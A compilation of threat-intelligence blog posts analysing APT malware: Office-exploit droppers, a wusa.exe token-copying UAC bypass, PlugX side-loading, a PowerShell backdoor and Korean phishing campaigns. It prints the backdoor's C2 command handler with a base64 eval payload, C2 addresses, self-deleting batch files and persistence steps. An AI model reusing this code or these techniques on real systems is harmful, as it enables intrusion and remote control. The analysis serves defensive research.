The malware starts off by resolving a list of encoded API addresses by accessing the address of kernel32 from the InMemoryOrderModuleList inside the Process Environment Block (PEB) using FS:[0x30]. It then gets the address of kernel32.LoadLibraryA and kernel32.GetProcAddress from a function which parses kernel32’s memory block. This is despite the malware already importing LoadLibraryA() and GetProcAddress(), and is used presumably to prevent automated systems from detecting massive amounts of calls to those functions.

From there, it gets the address of the other libraries it makes use of – Shlwapi.dll, Shell32.dll, Gdi32.dll, User32.dll, and Advapi32.dll. Once that is done, it calls the function which parses the various DLLs again close to 100 times in order to resolve all the APIs it uses. In the middle of those calls, it checks CheckRemoteDebuggerPresent and does not resolve the APIs from the other DLLs if a debugger is found, which will cause the malware to exit later before doing anything malicious.

Malware decrypting the imports it uses via its custom hashing algorithm

It then starts a thread which polls the result of CheckRemoteDebuggerPresent constantly and exits once a debugger is found.

Process Name Hashing

The malware checks for the lower-cased process name it is running under at various steps of execution using a string hashing algorithm. In the first step, it checks against the string hash “0xAB341DFA”, “0x190BC0F1”, “0x639EBCBF”, “0xA6AFB610”, “0x4D16CE36”, and “0x64820461”. It only continues execution if the process name hash is one of the first five hashes and the process name hash is not the last hash. We wrote a custom bruteforcing utility and managed to crack the first five hashes, finding the process names which the attacker expected as “winword.exe”, “excel.exe”, “powerpnt.exe”, “acrord32.exe”, and “eqnedt32.exe”. While four of these process names are associated with Microsoft Office and the Equation Editor vulnerabilities, “acrord32.exe” (Adobe Reader) is also in the expected process name list because the malware will in some situations rename the legitimate signed Symantec executable file (described later) to “AcroRd32.exe”.

Malware making sure the process name is related to the exploit source or itself

Besides this initial check, it also checks the hashes of process names at three other points of execution. Only the hash 0X84F39C89 is checked against the entire process list and is not a lower-case version of the process name.

0X0E867CB6rundll32.exeIf process is rundll32.exe, do not continue
0XA54ACF71explorer.exeIf process is not explorer/services.exe, do not continue
0XCD163D44services.exe If process is not explorer/services.exe, do not continue
0X84F39C89<unknown>If this process exists, do not inject into dllhost.exe

From this we can see there are actually two points from which the malware expects to run from – using the Microsoft Office exploit which injects the second stage malware into dllhost.exe or another path which injects into explorer.exe/services.exe.


This first stage malware mainly decompresses and drops two files being used for persistence.

File NameDescription
RasTls.dllRenamed from cclerr.wll
IntelGraphicsController.exe / AcroRd32.exeLegitimate signed Symantec file (real name: dot1xtra.exe) from Symantec Network Access Control agent (version 12.1.671.4971)
Hash: 724909ba378a872018a3ae0b68afe4949bc404de31bcbd65a6239c12b3a7a3ea

Public examples of a different version of this same signed file being abused in the wild was with version 11.0.4010.7, where the filenames used were rastlsc.exe and iassvcs.exe. Though these files were signed, their certificates have long expired.

The files used for persistence are stored in either the “%AppData%\Intel\Intel(R) Processor Graphic\” or “%PROGRAMFILES%\Intel\Intel(R) Processor Graphics\” directories.

The persistence keys used are in <HIVE>\Software\microsoft\windows\currentversion\run where <HIVE> is either HKLM or HKCU depending on whether there is administrative rights. The name of the registry key used is “IntelGraphicsController” with the value of “<DIRECTORY_TO_INTELGRAPHICSCONTROLLER.EXE> Processid:{0A10C245-2190-7215-A3C5-43215926716A}”.

Commands Ran

The malware runs CreateProcess from a custom command execution function four times, with each run executing takeown/icacls/icacls. The first icacls function attempts to give ownership to the administrators group and the second icacls function attempts to give ownership to the users group. The four runs are for the RasTls.dll file in the %APPDATA% and %PROGRAMFILE% subdirectories and the IntelGraphicsController.exe file in the %APPDATA% and %PROGRAMFILE% subdirectories.

Besides those commands, it also drops two batch files.

<random.bat> – deleting from initial location
Ping -n 10 del “C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\cclerr.wll” /q /f del %0 /q /f

<random.bat> – attempting to delete winword.exe
Ping -n 10 del “C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /q /f del %0 /q /f


The malware uses kernel32’s GetFileTime() and SetFileTime() to get the Creation Time, Last Access Time, and Last Write Time of %windir%\system32\kernel32.dll and saves those same times to the RasTls.dll and IntelGraphicsController.exe files. However, these timestamps are only approximate [3] so the fake times will not be an exact match to kernel32.dll’s file time.

The main two files dropped by the malware for persistence have the approximate timestamps of kernel32.dll

Victim Identification

The malware identifies its victims using <HIVE>\Software\Intel\Java (with <HIVE> being HKLM/HKCU again) with the name “user”. Malware “1-a” referenced below is the current first stage malware we are describing in this post.

Malware “1-a” and “5-a” contain the same victim identifier values, as do “2-a” and “3-a”. This is interesting because of the second stage malware which we describe briefly later.

Malware  Victim Identification Value
1-a 0XdgrHGaayfyBHQ/vCwMP2HE+cNEbzTk

Process Injection

Finally, the malware performs process injection into “%windir%\system32\dllhost.exe /Processid:{712459B2-3311-54C3-910D-0327080553246}” without the second stage ever touching the disk. The injected process, dllhost.exe, is typically a container process for running COM DLLs. The list of CLSIDs in a system can be seen in KEY_CLASSES_ROOT\CLSID. We are unsure what the hardcoded CLSID value of “712459B2-3311-54C3-910D-0327080553246” is supposed to represent, but a likely guess is a CLSID used by Symantec since the malware is impersonating their executable file.

Second Stage Malware

While we did not analyze the second stage malware in large detail, we did decode the C2 information among other data such as credentials. The samples we analyzed appear to connect to two external C2 IP addresses 217[.]69[.]8[.]255 and 1[.]187[.]1[.]187 on port 443. It also references an internal IP address, which indicate that these spear phishing documents are sent to targeted victims and only after the attacker already has basic access to the victim’s internal network.

One of the purposes of this second stage malware also appears to be for creating a remote command shell.

MalwareInternal IPs Referenced

With the malware trying to target/use the same internal IP but with different user identification values, we see how the attacker is custom compiling each malware executable for each victim/attempt in a specific organization.


SectorB06 is a threat group with very specific interests and in the case of these malware, appears to either already have a basic foothold in the victim network or has already gained and then lost access to the network. They are actively developing their toolkit and are adept at bypassing security solutions at least statically especially for their exploit document and second stage malware.

Indicators of Compromise

Decoy Hash (SHA-256)


First Stage Hashes (SHA-256)


Second Stage Hashes (SHA-256)


IP Addresses


MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1193 Spearphishing Attachment


T1059 Command-Line Interface
T1203 Exploitation for Client Execution
T1064 Scripting
T1204 User Execution
T1218 Signed Binary Proxy Execution


T1038 DLL Search Order Hijacking
T1060 Registry Run Keys / Startup Folder

Defense Evasion

T1116 Code Signing
T1038 DLL Search Order Hijacking
T1107 File Deletion
T1055 Process Injection
T1218 Signed Binary Proxy Execution
T1045 Software Packing
T1099 Timestomp


T1057 Process Discovery
T1012 Query Registry
T1063 Security Software Discovery
T1124 System Time Discovery


T1119 Automated Collection


T1022 Data Encrypted

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol


[1] Microsoft Office : List of security vulnerabilities
[2] CVE-2018-0802 | Microsoft Office Memory Corruption Vulnerability
[3] GetFileTime function

Threat Actor Group using UAC Bypass Module to run BAT File


Our Threat Recon team continues to collect and analyze activity-related data from multiple APT groups. We analyzed malware used in hacking activities targeting organizations located in South Korea, the US, and East Asia earlier this year. They use a CAB file that compresses the malware, separate configuration files and a specific User Access Control (UAC) bypass module. This article briefly describes the infection method of the malware that they were using at the time and the UAC bypass module used.

Infection Method

The attackers used quite a few steps to generate their malware, and the initial infection comes from malicious documents attached to spear phishing emails. When a user executes a file attached to the email, a batch file for downloading a base64-encoded CAB file from a remote site is downloaded through a script included in the document.

Infection method using CAB file

The following is the sequence of the infection method that they use.

  1. Download base64 encoded data 1.txt via script embedded in malicious documents
  2. Decode “1.txt” to create “1.bat” and run “1.bat”
  3. “1.bat” downloads 2.txt (32-bit) or 3.txt (64-bit) according to the Windows platform environment (32bit / 64bit)
  4. Decode “2.txt” or “3.txt” to create “”

Each file looks like an SSL certificate using the string “—– BEGIN CERTIFICATE —–“, but this is actually a base64 encoded cab and bat file.

Left: The 1.bat file used to decompress the CAB file and run the main payload
Right: The 2.txt CAB file for 32-bit Windows systems

The CAB file is created according to the Windows platform environment through the following files:

  1. BAT file for main payload file execution
  2. INI file containing attacker server address
  3. DLL file for UAC bypass
  4. Main EXE payload

Why does UAC Run?

This malware’s first batch file (1.bat) executes a second batch file which installs the main payload. A UAC pop-up will normally be shown to the user and this is caused by the code in the BAT file that installs the main payload. It copies the INI configuration file and the main payload EXE into the System32 folder.

In general, when files are copied to the System32 folder, a UAC pop-up will run for security reasons. This folder should not be modified in normal situations because it contains important files used to operate the system.

Why UAC runs

BAT File Details

The first batch file (1.bat) downloads the file from a remote server and uses the “net session> nul” command to verify the current user rights and perform the following actions:

  • If admin : Delete UAC bypass DLL, execute main payload and BAT file
  • If not admin : Execute the following command using rundll32.exe
    Command : “[UAC Bypass Module], EntryPoint [Main Payload execution BAT file]”.
Batch Code

The batch file used to install the main payload copies the main payload executable and INI configuration files into the System32 folder, and then runs the main payload which was moved to the System32 folder.

BAT file running Main Payload Code

About UAC

User Account Control (UAC) is a Windows operating system security control function based on the concept of access tokens. It displays a screen informing the user when a program requires administrator level privileges, acting as a warning prompt for user consent of unknown privileged activity.

UAC popped up on screen

How it works

When a user logs into Windows, each user is given an access token. This access token has information on the security identifier (SID), the Windows operating system privilege, and the access level granted to the user, and the Windows system uses the access token to verify the user’s privilege. The access tokens generated at login are:

  • standard user : Generates a standard user access token
  • administrator : Generate standard user access token, administrator access token

The system allocates the following integrity levels according to the token privileges of the logged-in user. System performs access control by comparing the access rights of the security descriptor of the object with the user’s SID.

Processes that run at Medium Level

Issued tokens are used for events such as process creation. The important thing here is that when a process is created after issuing a token, the administrator also executes the new process using the standard user access token.

Generally, explorer.exe which is the parent process of most user processes operates at medium integrity level, so most processes run at the same level to explorer.exe. But when a process requires a high integrity level, processes can obtain an elevated privilege if the user approves it.

This basically means that a process typically uses a standard user access token and uses the UAC to get the user’s authorization if an administrator access token is needed.

The following such actions are examples of events which trigger UAC:

Running an Application as an Administrator
Changes to system-wide settings
Changes to files in folders that standard users don’t have permissions for (such as %SystemRoot% or %ProgramFiles% in most cases)
Changes to an access control list (ACL), commonly referred to as file or folder permissions
Installing device drivers
Installing ActiveX controls
Changing settings for Windows Firewall
Changing UAC settings
Configuring Windows Update
Adding or removing user accounts
Changing a user’s account type
Turning on Guest account (Windows 7 and 8.1)
Turning on file sharing or media streaming
Configuring Parental Controls

UAC Bypass Module

However, the attackers in this case use a particular DLL module for bypassing UAC. It seems to have been created by referring to the source code of a file named UAC-TokenMagic.ps1 which is open source on GitHub.

First, it creates a wusa.exe process (an auto-elevatable process) that runs at a High Integrity Level. This process is the Windows Update Standalone installer, and it has an auto-elevate attribute so it does not pop up UAC if the system UAC popup setting is “Notify me only when programs / apps try to make changes to my computer”.

After creating wusa.exe, it copies that token and run the cmd.exe process via CreateProcessWithLogonW using the copied token. Finally, cmd.exe runs at a High Integrity Level and executes “/c EntryPoint” %Temp%\[bat file install main payload]” and this batch file inherits the elevated privilege of cmd.exe.

Part of the UAC Bypass module code

If the attacker is using the UAC bypass module, the batch file that runs the main payload will work through the cmd.exe generated by copying the access token from wusa.exe. In conclusion, the UAC will not pop up even if the code that moves the file into the System32 folder in batch file is executed.


The attackers compress the UAC Bypass Module with other components and distributes them in a CAB file format. We have seen this threat actor group mainly use decoy documents written in Russian, English and Korean and used the BABYFACE, SYSCON malware variants as the main payload. Such activity may be related in part to the activities of the previously known threat actor groups. Our Threat Recon team will continue to monitor these Cyber Threat.

Indicators of Compromise



IP Addresses



Reading Your Way Around UAC (Part 1)
User Account Control

SectorM04 Targeting Singapore – An Analysis


On or around June 27, 2018, personal particulars of almost 1.5 million people was exfiltrated from a SingHealth database in Singapore where information on patients was stored. Multiple pieces and types of malware was used in this attack which took place over almost a year [1].

Illustration using details from p.53 of the COI report

On 6th March, Symantec released a blog article [2] linking several pieces of malware and a threat group which we will be tracking as SectorM04 to Singapore’s SingHealth breach last year. One such artifact we found an exact match on was the DLL Shellcode Loader which was referred to as Trojan.Vcrodat that is one of the files dropped as something which has characteristics of the PlugX RAT. The PlugX RAT is a RAT which has been used by multiple threat groups, including one which was reported to have interests in the healthcare sector [3].

Decoy (e9b12791e0ab3a952fa09afd29e5a1416abd917edf5c913af7573adf8ccc39b0)

The dropper for that file was in the form of a decoy executable/document and named as “PositionRequirement-SeniorCivilEngineer.doc.exe”. Opening this results in the Word document below being opened, and everything will seem normal to the victim.

Decoy document that is opened after executing the malware

However, this is actually a trick because the malware uses a “.docx.exe” extension. The actual executable drops other files in the same folder – a legitimate signed executable, a malicious DLL file which abuses the DLL search order [4] from the executable, a compressed shellcode file, a simple batch script (a.bat) to clear its tracks, and a normal Word document. The executable then executes the normal Word document, the batch script, and drops the remaining three files and executes the legitimate signed executable.

a.bat – a simple batch script to hide the tracks of the original EXE
:Repeat del <filepath>\filename.docx.exe if exist <filepath>\filename.docx.exe goto Repeat

If this was the RAT used for the initial infection, then it seems to reinforce the theory that one likely initial infection vector was via spear phishing using a link or an archived file [1]. This is because using an exploit to automatically run this dropper would not make sense as the malware also automatically opens a benign Word document which would arouse suspicion if it opened by itself.

PlugX Trinity

Those remaining three files are actually the three files in what other researchers have dubbed the PlugX Trinity [5] – a legitimate signed executable, a loader DLL, and a shellcode file.

In this example, while the legitimate signed executable was a file named adobe.exe it was actually an application from ESET. However, the attacker uses DLL side loading, and this “adobe.exe” file tries to load MSVCR110.dll which is a legitimate system DLL. But because of the way the DLL search order works, the system tries to find MSVCR110.dll from the directory from which the application loaded first, thus loading the attacker’s version of MSVCR110.dll.

MSVCR110.dll is a tiny dll made up of exported functions which the real MSVCR110.dll should have. These external functions simply jump to the MSVCR90.dll when called, except for the “__crtGetShowWindowMode” function which calls the malicious function. The malicious function will proceed to read the MSVCR110.dat shellcode file into memory and decompress the buffer using RtlDecompressBuffer under the COMPRESSION_FORMAT_LZNT1 scheme, a method seen since early days of the PlugX RAT [6], and further unpack the shellcode. Throughout the unpacking process, it makes use of its Process Environment Block (PEB) to parse the PEB_LDR_DATA structure for getting addresses of functions and libraries it wants to use.

When starting, this malware uses the Global mutex named “eeclnt”. It will run another copy of itself with the arguments “258”, and this copy will run %windir%\system32\msiexec.exe as it disables WOW64 redirection.

The created msiexec.exe will be started with the flags 0x434 which among other things starts the process in a suspended mode and command line arguments “259”, then performs process injection so that the malware is running as msiexec.exe.


In order to persist on a system, the malware makes use of %APPDATA%\Windows folder, setting the folder attributes to HIDDEN | SYSTEM and moving MSVCR110.dll, MSVCR110.dat, and eeclnt.exe (renamed from adobe.exe) there. It stores this new location of the shellcode file (MSVCR110.dat) in an environment variable “%UI00%” and the location of the DLL file (MSVCR110.dll) in an environment variable “%UI01%”.

There are two persistence mechanisms it makes use of:

  1. Service with service name and display name set to “WanServer”, which starts %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”. The service description used is “Network for this computer. If this service is stopped, these functions will be unavailable.”, which is a generic sounding but unique description for this malicious service.
  2. If the service failed to be created, most likely due to insufficient privileges, then the malware would make use of the standard run registry key located at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with key “eeclnt” and value %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”.
Command LineDescription
NULLRe-run with arguments “258” and continue
“258” / “260”Run %windir%\system32\msiexec.exe with arguments “259” or “261” respectively in suspended mode and inject itself into it
“259”Create persistence via service / run registry key and run itself as “eeclnt.exe” with arguments “260”
“261”Run normally, including C2 communications.

C2 Beacon

The malware beacons using a legitimate HTTPS POST on port 443 to “/login.asp?id=%d” where %d is the victim identifier using the user-agent “User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)” via WinINet.dll’s HttpSendRequestA. If the configuration uses a different port, then the request is done via HTTP.


The malware manually sets inline hooks on SspiCli.dll’s AcquireCredentialsHandleA function if running on Windows 10. AcquireCredentialsHandleA is actually a function normally called from secur32.dll, which then forwards the API call to SspiCli.dll. Before performing the actual function, the inline hook will use the process token from explorer.exe and perform ImpersonateLoggedOnUser() with that token, which is a trick we are seeing for the first time and seems to be for UAC bypass.

The malware also manually sets inline hooks on WSs2_32.dll’s closesocket and shutdown functions. Before performing the closesocket function, the inline hook will perform “setsockopt(socket, SOL_SOCKET, SO_DONTLINGER, 0, 4)” and on shutdown, the inline hook will simply return from the function instead.

Information Collected

The malware mainly collects the following information from the system automatically:

  • Major, minor, and build OS versions
  • NetBIOS Name
  • MAC Address
  • Logged on user name

Other PlugX Capabilities

Similar to previous PlugX variants [7], this version zeroes out its entire PE header (without that false “XV” header), together with other certain other PE sections we presume the attacker did not want others to see.

Finally, besides this technical analysis, it is important to remember that PlugX in general has reverse shell capabilities and typically has additional modules which might be either decrypted or downloaded as shellcode [8].


While we cannot be sure of the SectorM04’s motives, healthcare data is information that has a lot of potential for intelligence gathering with the most obvious being used for blackmail. They have shown their willingness, ability, and patience to compromise their targets, of which Singapore appears to be one of the bigger ones. As is the case for many nation state threat actor groups, it is important to remember that cyber is only one part of an intelligence operation.

ATT&CK Matrix


Indicators of Compromise

PlugX Trinity Hashes (SHA-256)

PlugX RAT Full Dropper

PlugX Trinity – Legitimate signed executables

PlugX Trinity – Malicious DLLs which are used to abuse search order

PlugX Trinity – Shellcode files

Other Hashes (SHA-256)

Another RAT Used




IP Addresses




SectorD02 PowerShell Backdoor Analysis


SectorD02 is a state sponsored threat actor group which mainly targets governments and organizations around the Middle East. In this case, the target of this malware was Turkey, although it has been reported that they also sometimes target countries outside of the Middle East. One characteristic of SectorD02 is their incrementally changing PowerShell backdoor.

We came across two of SectorD02’s such backdoors at the end of 2018, and we analyzed these variants then identified them as the group’s PowerShell malware. SectorD02 focuses on using PowerShell scripts to carry out their attacks and loading those scripts past layers of obfuscation through a variety of methods. One such method is via PS2EXE (PowerShell to EXE), and our analysis on public reporting has shown they have used this vector sometimes [1] since their attacks had first been grouped and given a name [2].

PowerShell Backdoor

Both versions of the PS2EXE backdoors we came across end up executing the exact same PowerShell script (which includes the same victim ID), and the main difference seems to be that they were compiled seconds apart and yet having different compiler linker versions.

Hash (SHA-256)Compile TimestampLinker Version
4cdf04c09d144c0c1b5ec7ac91009548db1546e1d1ed4d6fbfb64942a0bd039414.10.2018 09:20:038.0 (.NET 2)
d95fada028969497d732771c4220e956a94a372e3fd543ba4d53b9a927cabe1c14.10.2018 09:20:2010.0 (.NET 4)

This is a strange scenario and seems to indicate that the attacker had likely either introduced build automation into its malware creation process or had more than one employee/machine/environment for creating builds for distribution and did so almost at the same time. However, since SectorD02 is constantly changing their methods of producing malware and the scripts themselves, it does not make any economical sense to automate this in a build and we have not seen evidence of it elsewhere, so the latter is what we believe to be the most likely scenario.

After extracting the encoded PowerShell script from the PS2EXE executable, the first thing we see is some Hebrew text stored in two variables. These same unused variables have been left there in other variants of their backdoor reported by others, but is completely meaningless as the attackers have even left Chinese text in earlier samples [3].

Some of the things we see in this version are:

  • Hiding and setting of system attribute for svchost.html,, and svchosts.exe in the C:\Windows directory. Similar sounding filenames/extensions have been reported being used by this group elsewhere [4], and indicate that there are other pieces of malware used in the same attack we are not yet aware of.
  • First persistence: Standard HKLM run registry key for “WindowsDefender” with the value “c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\Windows\svchost.html,svchost,1,”.
  • Second persistence: Scheduled task with the same value as before under “Microsoft\WindowsMapsUpdateInfo”.

Creating the Victim ID

As usual, they follow their mechanism for getting the victim ID using a combination of information taken from the victim machine. This similar kind of mechanism can be seen since early last year [5]. Recently, other researchers found a different version which used “::” as a separator instead of “**” [6], but it is hard to say whether these malware are made by the same group.

$SysInfo = getOS $SysInfo += “**” $SysInfo += getIP $SysInfo += “**” $SysInfo += getArch $SysInfo += “**” $SysInfo += getHostName $SysInfo += “**” $SysInfo += getDomain $SysInfo += “**” $SysInfo += isAdmin $SysInfo += getUsername $SysInfo += “**” $SysInfo += getPIP $global:id = md5generator($SysInfo) return ($global:id + ‘**’ + $SysInfo)

C2 Commands

When the group is not changing their malware functionality, they are constantly at least changing their naming of items in their scripts. In this variant, we can see the commands “upload”, “cmd”, “b64”, and “muddy”.

function command_and_control($cmd){ try{ if($cmd.StartsWith(‘upload’)){ try{ $cmd=$cmd.replace(‘upload ‘,”) $wc = New-Object System.Net.WebClient $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials $wc.DownloadFile($cmd, (“c:\programdata\” + $cmd.Substring($cmd.LastIndexOf(‘/’),$cmd.Length-$cmd.LastIndexOf(‘/’)))) return Eval “pwd” }catch{ return $_.Exception.Message } } elseif($cmd.StartsWith(‘cmd’)){ $cmd=$cmd.replace(‘cmd ‘,”) try{ $out = cmd /c $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘b64’)){ $cmd=$cmd.replace(‘b64 ‘,”) try{ $cmd = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($cmd)) $out = Eval $cmd $out = $out | Out-String return $out } catch { return $_.Exception.Message } } elseif($cmd.StartsWith(‘muddy’)){ $cmd=$cmd.replace(‘muddy ‘,”) $cmd = shttpGET($cmd) set-content -path “c:\programdata\LSASS” -value $cmd try{ Start-Process powershell -ArgumentList ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(“LWV4ZWMgQnlwYXNzIC1jICRzPShnZXQtY29udGVudCBjOlxwcm9ncmFtZGF0YVxMU0FTUyk7JGQgPSBAKCk7JHYgPSAwOyRjID0gMDt3aGlsZSgkYyAtbmUgJHMubGVuZ3RoKXskdj0oJHYqNTIpKyhbSW50MzJdW2NoYXJdJHNbJGNdLTQwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtpZXgoW1N0cmluZ106OkpvaW4oJycsJGQpKTs=”))) -WindowStyle Hidden return (Eval “ls c:\programdata”) } catch { return $_.Exception.Message } } else { return Eval $cmd } } catch{ return $_.Exception.Message } }

Random Proxy

This variant has four C2 IP addresses and uses one of them randomly. These IP addresses were used in other attacks around the same time as well [1]. As usual, these C2 servers are likely to be simply hacked servers like as before [7], something acknowledged by the attacker when they refer to their servers as proxies as well.

$C = @(‘hxxp://78[.]129[.]139[.]148′,’hxxp://79[.]106[.]224[.]203′,’hxxp://104[.]237[.]233[.]17′,’hxxp://185[.]34[.]16[.]82’) function getRandomProxy(){ $rnd = Get-Random -minimum 0 -maximum ($C.Length) $global:url = $C[$rnd] }

Interestingly, even at the time of writing, two of the proxy C2 servers (79[.]106[.]224[.]203 and 185[.]34[.]16[.]82) had the “MikroTik bandwidth-test server” on port 2000 enabled and that could have been how the servers got compromised and used as C2 servers.


SectorD02 is one of those groups which are much harder and complicated to attribute attacks to because attribution based solely/heavily on technical indicators from malware simply does not work. We have talked about this before in our previous post [8] and although this backdoor can be considered a custom malware, it may as well be open source because it is so easy for others to modify these malware and reuse it for their own attacks.

Indicators of Compromise

Hashes (SHA-256)






The Double Life of SectorA05 Nesting in Agora (Operation Kitty Phishing)


In early January 2019, an email containing malware was distributed to 77 reporters covering topics related to the Unification Ministry of South Korea. We analysed these malware and identified them as malware used by SectorA05, and we confirm that they have been using a specific C2 server with a Korean domain name using Japanese IP address for at least 27 months continuously.

In addition to these phishing attacks containing malware, phishing attacks were also used to steal email account information. These attacks mainly targeted South Korean government personnel such as employees from the central government, unification ministry, diplomacy, and defense. Recently, they have also expanded their targets to include cryptocurrency exchanges and individual users.

Their main purpose is to capture government confidential information and achieve monetary gain through stealing cryptocurrencies such as Ethereum and Bitcoin. We decided to group these wave of attacks under what we call “Operation Kitty Phishing”. Their attacks have been ongoing on a daily basis, and what we have discovered so far only appears to be the tip of the iceberg.

January 2019 Unification Reporters Attack

On January 7th, 2019, an email containing malware was distributed to 77 reporters who cover topics related to the Unification Ministry of South Korea using the email subject “RE: TF 참고자료”. A “TF 참고.zip” attachment had a password set and the password was sent along with the body of the email. The word “비번” in the body of the email is a slang word is used mainly by South Koreans, so these hackers are proficient in South Korean.

The zip attachment consists of two normal document files and a piece of executable malware disguised using a Hangul Word Processor (HWP) document icon with a lot of spaces in the filename so that the “.exe” extension is not visible to the user, thereby inducing file execution. When the malware is executed as an SFX (self-extracting archive) file type, it decompresses one normal Hangul Word Processor (HWP) document, “2.wsf” and “3.wsf”. What is unique about this is that it uses two different RATs. The first RAT is a DLL downloaded via “2.wsf” and the second RAT is the script-based “3.wsf” file. Even if one of them are detected, the other one gets used.

A. DLL-based RAT (downloaded by “2.wsf”)

The purpose of the “2.wsf” script is to download and run the BASE64 encoded “Freedom.dll” malware.

The malware spreads using a Google Drive URL in the “2.wsf” script. The URL of the C2 server is stored in Google Drive, and the C2 URL at the time of analysis was “hxxp://my-homework.890m[.]com/bbs/data/”.

“2.wsf” sends a progress log to the C2 server by the progress step so that the hacker can check the progress of each target user.

hxxp://my-homework.890m[.]com/bbs/data/board.php?v=a Finished getting C2 URL
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=b The file name to be saved has been created
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=c The brave.ct file has been downloaded.
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=e Decoded and saved as Freedom.dll
hxxp://my-homework.890m[.]com/bbs/data/board.php?v=f Executed the Freedom.dll file.

The file downloaded via “2.wsf” is “Freedom.dll”. This file uses Google Drive to get the address of the C2 server, but if it cannot connect to the C2 server or Google Drive, it uses “ago2[.]co[.]kr” as the C2 by default. This C2 server using a Korean Top Level Domain with a Japanese IP address is an important clue to track them.

This “Freedom.dll” file is designed to act as a downloader and has the following roles:

  • Check whether OS is 32-bit or 64-bit. If it is a 64bit OS, download and decrypt 64-bit malware ( then execute it.
  • It periodically sends infection information to the C2 server using the server relative path “/bbs/data/tmp/Ping.php?WORD=com_[MAC Address]&NOTE=[Windows Version]”
  • If the hacker uploads additional malware for a specific user, download “Cobra_[MAC Address]” file from C2 and decrypt the “Cobra_[MAC Address]” file then run Cobra.dll.
  • “/bbs/data/tmp/D.php?file=Cobra_[MAC Address]” is used to delete files from the C2 server.
  • DLL injection to explorer.exe

The “Freedom.dll” file uses a XOR Table to download and decrypt additional encrypted malware hosted on the C2 server. The XOR Table values used is ”
B20A82932F459278D44058ADBF3113FB56C1D749947D0FE00FE0ABC84BC8A02B” and this XOR Table has also been used in previous attacks of same hacker organization. More information about this XOR table is covered later in this post.

Depending on the target user, the hacker also selectively sends additional malware binaries under the file name “Cobra_[MAC Address]” which steals user information. This helps them ensure that their more valuable malware is kept only for victims they are interested in.

These additional malware binaries are covered later in this post.

B. Script-based RAT (“3.wsf”)

The “3.wsf” script is a script-based RAT. Unlike other malicious WSF (Windows Script File) scripts, it has its own RAT function and registers itself in the “RUN” registry with an “AhnLab V4” value to the persistent mechanism. AhnLab is a Korean local security vendor.

“3.wsf” downloads the C2 server’s URL from Google Drive.

hxxp://my-homework.890m[.]com/gnu/ver Version Check / Update
hxxp://my-homework.890m[.]com/gnu/board.php?m=MAC_ADDR&v=VERSION|TIMEOUT Get C2 command

The kinds of commands that the attacker makes through the C2 server are as follows.

[C2 command processing logic included in ‘3.wsf’ RAT]
C2 Control CodeDescription
cmd Execute command
download Download file from C2 server
upload Upload file to C2 server
update Update the “3.wsf” file
interval Change execution cycle (Default value 3 minutes)

A look at their past

We analyzed the above malware and identified them as SectorA05. Below is a look at their activities and attack methods based on the information from their malware.

Phishing Method of SectorA05 (Initial attack stage)

SectorA05 uses two methods of phishing for gaining initial access. First, phishing attacks to steal passwords of victim e-mail accounts and second, phishing attacks with malware attached to steal information of victim PCs.

A. Phishing attacks that steal passwords of email accounts

They create a phishing site similar to one that the target user uses and sends it to the target. They often mislead the victim using a security-related problem, such as a password reset request, to entice the target user to enter a password.

B. Malware attachment attacks

Malware is delivered via a variety of email attachments – script files, vulnerabilities in HWP documents, and renamed “EXE” executables looking like ordinary documents. These files are usually delivered as compressed files.

(1) Using script files

“WSF” and “VBS” script files are compressed into a single archive, which induces the user to execute the script file in the compressed file. The scripts used in the actual attack are as follows.

  • “정보보고.wsf” (Jan 2018)

    SHA256: 575606c03d3775cd8880c76a3ef7c014cfcab08411a01f07fc3fcb60166be50b

  • “공지사항.png.vbs” (July 2018)

    SHA256: c87f4aeebd3f518ba30780cb9b8b55416dcdc5a38c3080d71d193428b0c1cc5a

(2) Vulnerabilities in HWP documents

Using vulnerabilities in the HWP software which is widely used in Korea, malware can be executed when the target user views this document which was attached to the email. The HWP file used in the actual attack is as follows.

  • “종전선언.hwp” (May 2018)

    SHA256: 5f2ac8672e19310bd532c47d209272bd75075696dea6ffcc47d1d37f18aff141

(3) Executables looking like normal documents

The attacker inserts a lot of spaces in the filename to make the extension of the executable file such as “.exe” or “.scr” to be hidden from the user and misleads them into thinking the executable files are normal document files. The files used in the actual attack are as follows.

  • “미디어 권력이동⑥-넷플렉스, 유튜브.hwp [many space] .exe” ( Jan 2019)

    SHA256: c6c332ae1ccb580ac621d3cf667ce9c017be41f8ad04a94c0c0ea37c4789dd14

  • “중국-연구자료.hwp [many space] .scr” (Jan 2019)

    SHA256: 84edc9b828de54d4bd00959fabf583a1392cb4c3eab3498c52818c96dc554b90

Use of Google Drive

SectorA05 used Google Drive as a way to supply malware. Malware binaries, C2 domain information necessary for normal malware operations, and malware configuration files were all uploaded to Google Drive with accounts they created. These binaries will be downloaded through a script executed by the victim during the initial infection, with additional configuration or customized malware downloaded as well afterward. Using Google Drive also allowed them to bypass network security devices which would typically ignore Google services as a white-listed domain.

Here is a screenshot of Google Drive used by them.

The Google Drive URLs identified as used by the organization are:

  • hxxps://drive[.]google[.]com/uc?export=download&id=0B9_jdTGo3-sndXJESjllMkloOFU
  • hxxps://drive[.]google[.]com/uc?export=download&id=0B9_jdTGo3-snT3RTMHJMZEk2Szg
